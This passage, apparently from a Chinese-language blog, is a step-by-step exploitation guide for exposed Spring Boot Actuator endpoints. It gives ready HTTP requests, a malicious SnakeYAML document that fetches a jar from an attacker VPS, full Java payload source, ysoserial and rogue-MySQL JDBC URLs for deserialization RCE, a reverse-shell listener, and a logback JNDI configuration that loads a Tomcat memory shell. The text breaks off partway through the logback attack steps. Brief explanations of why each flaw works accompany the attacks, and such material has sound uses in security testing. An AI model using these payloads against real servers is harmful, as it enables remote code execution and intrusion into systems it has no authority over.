<p>使用 python 在自己控制的服务器上运行以上的脚本，并根据实际情况修改脚本中反弹 shell 的 ip 地址和 端口号。</p>
<h5 id="步骤二：监听反弹-shell-的端口"><a href="#步骤二：监听反弹-shell-的端口" class="headerlink" title="步骤二：监听反弹 shell 的端口"></a>步骤二：监听反弹 shell 的端口</h5><p>一般使用 nc 监听端口，等待反弹 shell</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvp 443</span><br></pre></td></tr></table></figure>

<h5 id="步骤三：设置-eureka-client-serviceUrl-defaultZone-属性"><a href="#步骤三：设置-eureka-client-serviceUrl-defaultZone-属性" class="headerlink" title="步骤三：设置 eureka.client.serviceUrl.defaultZone 属性"></a>步骤三：设置 eureka.client.serviceUrl.defaultZone 属性</h5><p>spring 1.x</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">POST /env</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line"></span><br><span class="line">eureka.client.serviceUrl.defaultZone=http://your-vps-ip/example</span><br></pre></td></tr></table></figure>

<p>spring 2.x</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">POST /actuator/env</span><br><span class="line">Content-Type: application/json</span><br><span class="line"></span><br><span class="line">&#123;&quot;name&quot;:&quot;eureka.client.serviceUrl.defaultZone&quot;,&quot;value&quot;:&quot;http://your-vps-ip/example&quot;&#125;</span><br></pre></td></tr></table></figure>

<h5 id="步骤四：刷新配置"><a href="#步骤四：刷新配置" class="headerlink" title="步骤四：刷新配置"></a>步骤四：刷新配置</h5><p>spring 1.x</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">POST /refresh</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br></pre></td></tr></table></figure>

<p>spring 2.x</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">POST /actuator/refresh</span><br><span class="line">Content-Type: application/json</span><br></pre></td></tr></table></figure>

<h1 id="spring-cloud-SnakeYAML-RCE"><a href="#spring-cloud-SnakeYAML-RCE" class="headerlink" title="spring cloud SnakeYAML RCE"></a>spring cloud SnakeYAML RCE</h1><h2 id="1-利用条件：-1"><a href="#1-利用条件：-1" class="headerlink" title="1 利用条件："></a>1 利用条件：</h2><ul>
<li>可以 POST 请求目标网站的 <code>/env</code> 接口设置属性</li>
<li>可以 POST 请求目标网站的 <code>/refresh</code> 接口刷新配置（存在 <code>spring-boot-starter-actuator</code> 依赖）</li>
<li>目标依赖的 <code>spring-cloud-starter</code> 版本 &lt; 1.3.0.RELEASE</li>
<li>目标可以请求攻击者的 HTTP 服务器（请求可出外网）</li>
</ul>
<h2 id="2-利用方法："><a href="#2-利用方法：" class="headerlink" title="2 利用方法："></a>2 利用方法：</h2><h3 id="步骤一：-托管-yml-和-jar-文件"><a href="#步骤一：-托管-yml-和-jar-文件" class="headerlink" title="步骤一： 托管 yml 和 jar 文件"></a>步骤一： 托管 yml 和 jar 文件</h3><p>在自己控制的 vps 机器上开启一个简单 HTTP 服务器，端口尽量使用常见 HTTP 服务端口（80、443）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"># 使用 python 快速开启 http server</span><br><span class="line"></span><br><span class="line">python2 -m SimpleHTTPServer 80</span><br><span class="line">python3 -m http.server 80</span><br></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/img_convert/8f83a087a04420c0d431f5ad8b526373.png" alt="image-20220129144602894"></p>
<p>在网站根目录下放置后缀为 <code>yml</code> 的文件 <code>example.yml</code>，内容如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">!!javax.script.ScriptEngineManager [</span><br><span class="line">  !!java.net.URLClassLoader [[</span><br><span class="line">    !!java.net.URL [&quot;http://your-vps-ip/example.jar&quot;]</span><br><span class="line">  ]]</span><br><span class="line">]</span><br></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/img_convert/f060ef15b802765e2c88898683acc65d.png" alt="image-20220129144519323"></p>
<p>在网站根目录下放置后缀为 <code>jar</code> 的文件 <code>example.jar</code>，内容是要执行的代码，</p>
<p>代码编写及编译方式参考 (<a target="_blank" rel="noopener" href="https://github.com/artsploit/yaml-payload/)%E3%80%82">https://github.com/artsploit/yaml-payload\)。</a></p>
<p>AwesomeScriptEngineFactory.java</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> artsploit;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> javax.script.ScriptEngine;</span><br><span class="line"><span class="keyword">import</span> javax.script.ScriptEngineFactory;</span><br><span class="line"><span class="keyword">import</span> java.io.IOException;</span><br><span class="line"><span class="keyword">import</span> java.util.List;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">AwesomeScriptEngineFactory</span> <span class="keyword">implements</span> <span class="title class_">ScriptEngineFactory</span> &#123;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="title function_">AwesomeScriptEngineFactory</span><span class="params">()</span> &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            Runtime.getRuntime().exec(<span class="string">&quot;dig quonwz.dnslog.cn&quot;</span>);</span><br><span class="line">            Runtime.getRuntime().exec(<span class="string">&quot;/Applications/Calculator.app/Contents/MacOS/Calculator&quot;</span>);</span><br><span class="line">        &#125; <span class="keyword">catch</span> (IOException e) &#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="keyword">public</span> String <span class="title function_">getEngineName</span><span class="params">()</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">null</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="keyword">public</span> String <span class="title function_">getEngineVersion</span><span class="params">()</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">null</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="keyword">public</span> List&lt;String&gt; <span class="title function_">getExtensions</span><span class="params">()</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">null</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="keyword">public</span> List&lt;String&gt; <span class="title function_">getMimeTypes</span><span class="params">()</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">null</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="keyword">public</span> List&lt;String&gt; <span class="title function_">getNames</span><span class="params">()</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">null</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="keyword">public</span> String <span class="title function_">getLanguageName</span><span class="params">()</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">null</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="keyword">public</span> String <span class="title function_">getLanguageVersion</span><span class="params">()</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">null</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="keyword">public</span> Object <span class="title function_">getParameter</span><span class="params">(String key)</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">null</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="keyword">public</span> String <span class="title function_">getMethodCallSyntax</span><span class="params">(String obj, String m, String... args)</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">null</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="keyword">public</span> String <span class="title function_">getOutputStatement</span><span class="params">(String toDisplay)</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">null</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="keyword">public</span> String <span class="title function_">getProgram</span><span class="params">(String... statements)</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">null</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="keyword">public</span> ScriptEngine <span class="title function_">getScriptEngine</span><span class="params">()</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">null</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>打包命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">javac src/artsploit/AwesomeScriptEngineFactory.java</span><br><span class="line">jar -cvf yaml-payload.jar -C src/ .</span><br></pre></td></tr></table></figure>

<p>打包完成</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/0684327bc6dadd4d7bc54e66ab3a719c.png" alt="image-20211224140901914"></p>
<h3 id="步骤二：-设置-spring-cloud-bootstrap-location-属性"><a href="#步骤二：-设置-spring-cloud-bootstrap-location-属性" class="headerlink" title="步骤二： 设置 spring.cloud.bootstrap.location 属性"></a>步骤二： 设置 spring.cloud.bootstrap.location 属性</h3><p>spring 1.x</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">POST /env</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line"></span><br><span class="line">spring.cloud.bootstrap.location=http://your-vps-ip/example.yml![]()</span><br></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/img_convert/c32e8d4fc6ffdb0ac32ca82e6a88fdf4.png"></p>
<p>spring 2.x</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">POST /actuator/env</span><br><span class="line">Content-Type: application/json</span><br><span class="line"></span><br><span class="line">&#123;&quot;name&quot;:&quot;spring.cloud.bootstrap.location&quot;,&quot;value&quot;:&quot;http://your-vps-ip/example.yml&quot;&#125;</span><br></pre></td></tr></table></figure>

<h3 id="步骤三：-刷新配置"><a href="#步骤三：-刷新配置" class="headerlink" title="步骤三： 刷新配置"></a>步骤三： 刷新配置</h3><p>spring 1.x</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">POST /refresh</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/img_convert/6b7c1ef47121b177fe49a5f9f291cae0.png" alt="image-20211224144527246"></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/03507b7045e2cd8a23d1d75622e0851e.png" alt="image-20211224144604954"></p>
<p>spring 2.x</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">POST /actuator/refresh</span><br><span class="line">Content-Type: application/json</span><br></pre></td></tr></table></figure>

<h2 id="3-漏洞原理："><a href="#3-漏洞原理：" class="headerlink" title="3 漏洞原理："></a>3 漏洞原理：</h2><ol>
<li>spring.cloud.bootstrap.location 属性被设置为外部恶意 yml 文件 URL 地址</li>
<li>refresh 触发目标机器请求远程 HTTP 服务器上的 yml 文件，获得其内容</li>
<li>SnakeYAML 由于存在反序列化漏洞，所以解析恶意 yml 内容时会完成指定的动作</li>
<li>先是触发 java.net.URL 去拉取远程 HTTP 服务器上的恶意 jar 文件</li>
<li>然后是寻找 jar 文件中实现 javax.script.ScriptEngineFactory 接口的类并实例化</li>
<li>实例化类时执行恶意代码，造成 RCE 漏洞</li>
</ol>
<h2 id="4-利用过程分析："><a href="#4-利用过程分析：" class="headerlink" title="4 利用过程分析："></a>4 利用过程分析：</h2><p>首先简单总结一下利用过程</p>
<ol>
<li>利用 <code>/env</code> endpoint 修改 <code>spring.cloud.bootstrap.location</code> 属性值为一个外部 yml 配置文件 url 地址，如 <code>http://127.0.0.1:63712/yaml-payload.yml</code></li>
<li>请求 <code>/refresh</code> endpoint，触发程序下载外部 yml 文件，并由 SnakeYAML 库进行解析，因 SnakeYAML 在反序列化时支持指定 class 类型和构造方法的参数，结合 JDK 自带的 <code>javax.script.ScriptEngineManager</code> 类，可实现加载远程 jar 包，完成任意代码执行</li>
</ol>
<p>从过程中我们知道，命令执行是由于 SnakeYAML 在解析 YAML 文件时，存在反序列化漏洞导致的，来看一个使用 SnakeYAML 库反序列化的例子</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">@Test</span><br><span class="line">public void testYaml() &#123;</span><br><span class="line">    Yaml yaml = new Yaml();</span><br><span class="line">    Object url = yaml.load(&quot;!!java.net.URL [\&quot;http://127.0.0.1:63712/yaml-payload.jar\&quot;]&quot;);</span><br><span class="line">    // class java.net.URL</span><br><span class="line">    System.out.println(url.getClass());</span><br><span class="line">    // http://127.0.0.1:63712/yaml-payload.jar</span><br><span class="line">    System.out.println(url);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>SnakeYAML 支持 <code>!!</code> + 完整类名的方式来指定要反序列化的类，然后以 <code>[arg1, arg2, ...]</code> 的方式来传递构造方法参数，例子中的代码执行完后会出反序列化一个 <code>java.net.URL</code> 类的实例</p>
<p>再来看一下文章给出的外部 yml 文件 <code>yaml-payload.yml</code> 的内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">!!javax.script.ScriptEngineManager [</span><br><span class="line">  !!java.net.URLClassLoader [[</span><br><span class="line">    !!java.net.URL [&quot;http://127.0.0.1:61234/yaml-payload.jar&quot;]</span><br><span class="line">  ]]</span><br><span class="line">]</span><br></pre></td></tr></table></figure>

<p>SnakeYAML 处理上述内容的过程可以等价于以下 java 代码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">URL url = new URL(&quot;http://127.0.0.1:63712/yaml-payload.jar&quot;);</span><br><span class="line">new ScriptEngineManager(new URLClassLoader(new URL[]&#123;url&#125;));</span><br></pre></td></tr></table></figure>

<p>代码执行后，会从 <code>http://127.0.0.1:63712/yaml-payload.jar</code> 地址下载 jar 包，并在包中寻找一个 <code>javax.script.ScriptEngineFactory</code> 接口的实现类，然后实例化，因为这个 jar 包代码是可控的，因此可执行任意代码</p>
<h2 id="5-漏洞环境："><a href="#5-漏洞环境：" class="headerlink" title="5 漏洞环境："></a>5 漏洞环境：</h2><p><a target="_blank" rel="noopener" href="https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springcloud-snakeyaml-rce">repository&#x2F;springcloud-snakeyaml-rce</a></p>
<p>正常访问：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1:9092/env</span><br></pre></td></tr></table></figure>

<h1 id="springboot-mysql-jdbc-deserialization-RCE"><a href="#springboot-mysql-jdbc-deserialization-RCE" class="headerlink" title="springboot mysql jdbc deserialization RCE"></a>springboot mysql jdbc deserialization RCE</h1><h2 id="1-利用条件：-2"><a href="#1-利用条件：-2" class="headerlink" title="1 利用条件："></a>1 利用条件：</h2><ul>
<li>可以 POST 请求目标网站的 <code>/env</code> 接口设置属性</li>
<li>可以 POST 请求目标网站的 <code>/refresh</code> 接口刷新配置（存在 <code>spring-boot-starter-actuator</code> 依赖）</li>
<li>目标环境中存在 <code>mysql-connector-java</code> 依赖</li>
<li>目标可以请求攻击者的服务器（请求可出外网）</li>
</ul>
<h2 id="2-漏洞原理：-2"><a href="#2-漏洞原理：-2" class="headerlink" title="2 漏洞原理："></a>2 漏洞原理：</h2><ol>
<li>spring.datasource.url 属性被设置为外部恶意 mysql jdbc url 地址</li>
<li>refresh 刷新后设置了一个新的 spring.datasource.url 属性值</li>
<li>当网站进行数据库查询等操作时，会尝试使用恶意 mysql jdbc url 建立新的数据库连接</li>
<li>然后恶意 mysql server 就会在建立连接的合适阶段返回反序列化 payload 数据</li>
<li>目标依赖的 mysql-connector-java 就会反序列化设置好的 gadget，造成 RCE 漏洞</li>
</ol>
<h2 id="3-利用过程"><a href="#3-利用过程" class="headerlink" title="3 利用过程"></a>3 利用过程</h2><h3 id="步骤一：查看环境依赖"><a href="#步骤一：查看环境依赖" class="headerlink" title="步骤一：查看环境依赖"></a>步骤一：查看环境依赖</h3><p>GET 请求 <code>/env</code> 或 <code>/actuator/env</code>，搜索环境变量（classpath）中是否有 <code>mysql-connector-java</code> 关键词，并记录下其版本号（5.x 或 8.x）；</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/c7e98fdc87a791558d9c483c2d3b9cc5.png" alt="image-20211208135505340"></p>
<p>搜索并观察环境变量中是否存在常见的反序列化 gadget 依赖，比如 <code>commons-collections</code>、<code>Jdk7u21</code>、<code>Jdk8u20</code> 等；</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/bc2e2a5847d95eca330fee0757177d0c.png" alt="image-20211208135537355"></p>
<p>搜索 <code>spring.datasource.url</code> 关键词，记录下其 <code>value</code> 值，方便后续恢复其正常 jdbc url 值。</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/db1c9547f8ccbe24f775537efa8bd63b.png" alt="image-20211208135606250"></p>
<h3 id="步骤二：架设恶意-rogue-mysql-server"><a href="#步骤二：架设恶意-rogue-mysql-server" class="headerlink" title="步骤二：架设恶意 rogue mysql server"></a>步骤二：架设恶意 rogue mysql server</h3><p>在自己控制的服务器上运行 <a target="_blank" rel="noopener" href="https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/springboot-jdbc-deserialization-rce.py">springboot-jdbc-deserialization-rce.py</a> 脚本，并使用 <a target="_blank" rel="noopener" href="https://github.com/frohoff/ysoserial">ysoserial</a> 自定义要执行的命令：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -jar ysoserial.jar CommonsCollections3 calc &gt; payload.ser</span><br></pre></td></tr></table></figure>

<p>在脚本<strong>同目录下</strong>生成 <code>payload.ser</code> 反序列化 payload 文件，供脚本使用。</p>
<h3 id="步骤三：设置-spring-datasource-url-属性"><a href="#步骤三：设置-spring-datasource-url-属性" class="headerlink" title="步骤三：设置 spring.datasource.url 属性"></a>步骤三：设置 spring.datasource.url 属性</h3><blockquote>
<p>⚠️ 修改此属性会暂时导致网站所有的正常数据库服务不可用，会对业务造成影响，请谨慎操作！</p>
</blockquote>
<p>mysql-connector-java 5.x 版本设置<strong>属性值</strong>为：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">jdbc:mysql://your-vps-ip:3306/mysql?characterEncoding=utf8&amp;useSSL=false&amp;statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&amp;autoDeserialize=true</span><br></pre></td></tr></table></figure>

<p>mysql-connector-java 8.x 版本设置<strong>属性值</strong>为：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">jdbc:mysql://your-vps-ip:3306/mysql?characterEncoding=utf8&amp;useSSL=false&amp;queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&amp;autoDeserialize=true</span><br></pre></td></tr></table></figure>

<p>spring 1.x</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">POST /env</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line"></span><br><span class="line">spring.datasource.url=对应属性值</span><br></pre></td></tr></table></figure>

<p>spring 2.x</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">POST /actuator/env</span><br><span class="line">Content-Type: application/json</span><br><span class="line"></span><br><span class="line">&#123;&quot;name&quot;:&quot;spring.datasource.url&quot;,&quot;value&quot;:&quot;对应属性值&quot;&#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/img_convert/ab4e2290cee71f2fdcffd2fb679b9a8c.png" alt="image-20211208142322601"></p>
<h3 id="步骤四：刷新配置-1"><a href="#步骤四：刷新配置-1" class="headerlink" title="步骤四：刷新配置"></a>步骤四：刷新配置</h3><p>spring 1.x</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">POST /refresh</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br></pre></td></tr></table></figure>

<p>spring 2.x</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">POST /actuator/refresh</span><br><span class="line">Content-Type: application/json</span><br></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/img_convert/762d2531957958354053a8b6062254f5.png" alt="image-20211208143044550"></p>
<h3 id="步骤五：触发数据库查询"><a href="#步骤五：触发数据库查询" class="headerlink" title="步骤五：触发数据库查询"></a>步骤五：触发数据库查询</h3><p>尝试访问网站已知的数据库查询的接口，例如： <code>/product/list</code> ，或者寻找其他方式，主动触发源网站进行数据库查询，然后漏洞会被触发</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">访问http://127.0.0.1:9097//product/list</span><br></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/img_convert/dfd49ee586cf53c065e3cf1882ff6f74.png" alt="image-20211208143638795"></p>
<h3 id="步骤六：恢复正常-jdbc-url"><a href="#步骤六：恢复正常-jdbc-url" class="headerlink" title="步骤六：恢复正常 jdbc url"></a>步骤六：恢复正常 jdbc url</h3><p>反序列化漏洞利用完成后，使用 <strong>步骤三</strong> 的方法恢复 <strong>步骤一</strong> 中记录的 <code>spring.datasource.url</code> 的原始 <code>value</code> 值</p>
<h1 id="restart-logging-config-logback-JNDI-RCE"><a href="#restart-logging-config-logback-JNDI-RCE" class="headerlink" title="restart logging.config logback JNDI RCE"></a>restart logging.config logback JNDI RCE</h1><h2 id="1-利用条件：-3"><a href="#1-利用条件：-3" class="headerlink" title="1 利用条件："></a>1 利用条件：</h2><ul>
<li>可以 POST 请求目标网站的 <code>/env</code> 接口设置属性</li>
<li>可以 POST 请求目标网站的 <code>/restart</code> 接口重启应用</li>
<li>普通 JNDI 注入受目标 JDK 版本影响，jdk &lt; 6u201&#x2F;7u191&#x2F;8u182&#x2F;11.0.1(LDAP)，但相关环境可绕过</li>
<li>⚠️ 目标可以请求攻击者的 HTTP 服务器（请求可出外网），否则 restart 会导致程序异常退出</li>
<li>⚠️ HTTP 服务器如果返回含有畸形 xml 语法内容的文件，会导致程序异常退出</li>
<li>⚠️ JNDI 服务返回的 object 需要实现 <code>javax.naming.spi.ObjectFactory</code> 接口，否则会导致程序异常退出</li>
</ul>
<h2 id="2-利用方法：-1"><a href="#2-利用方法：-1" class="headerlink" title="2 利用方法："></a>2 利用方法：</h2><p>步骤零：找到目标网站</p>
<p>发现<code>spring actuator</code> 目前主要有两个差别比较大的版本，1.x 和 2.x 版本。从路由角度看，2.x 版本的路由名一般比 1.x 版本路由名字前多了个 <code>/actuator</code> 前缀。本文涉及到的相关漏洞原理经过测试与 <code>spring actuator</code> 大版本的相关度差别不大，下文统一用 2.x</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/fb5b5542a58d4ebb5f1202be04618817.png" alt="image-20220106101333986"></p>
<h3 id="步骤一：托管-xml-文件"><a href="#步骤一：托管-xml-文件" class="headerlink" title="步骤一：托管 xml 文件"></a>步骤一：托管 xml 文件</h3><p>在自己控制的 vps 机器上开启一个简单 HTTP 服务器，端口尽量使用常见 HTTP 服务端口（80、443）</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 使用 python 快速开启 http server</span></span><br><span class="line">python3 -m http.server 80</span><br></pre></td></tr></table></figure>

<p>在根目录放置以 <code>xml</code> 结尾的 <code>example.xml</code> 文件，实际内容要根据步骤二中使用的 JNDI 服务来确定：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">configuration</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">insertFromJNDI</span> <span class="attr">env-entry-name</span>=<span class="string">&quot;ldap://110.xx.xx.110:1389/TomcatBypass/TomcatMemshell3&quot;</span> <span class="attr">as</span>=<span class="string">&quot;appName&quot;</span> /&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">configuration</span>&gt;</span></span><br></pre></td></tr></table></figure>

<h3 id="步骤二：托管恶意-ldap-服务及代码"><a href="#步骤二：托管恶意-ldap-服务及代码" class="headerlink" title="步骤二：托管恶意 ldap 服务及代码"></a>步骤二：托管恶意 ldap 服务及代码</h3><p>修改 <a target="_blank" rel="noopener" href="https://github.com/feihong-cs/JNDIExploit">JNDIExploit</a> 并启动（也可以使用其他工具）：</p>
<p><a target="_blank" rel="noopener" href="https://github.com/feihong-cs/JNDIExploit">https://github.com/feihong-cs/JNDIExploit</a></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -jar JNDIExploit-1.0-SNAPSHOT.jar -i 110.xx.xx.110</span><br></pre></td></tr></table></figure>

<h3 id="步骤三：设置-logging-config-属性"><a href="#步骤三：设置-logging-config-属性" class="headerlink" title="步骤三：设置 logging.config 属性"></a>步骤三：设置 logging.config 属性</h3><p>spring 1.x</p>
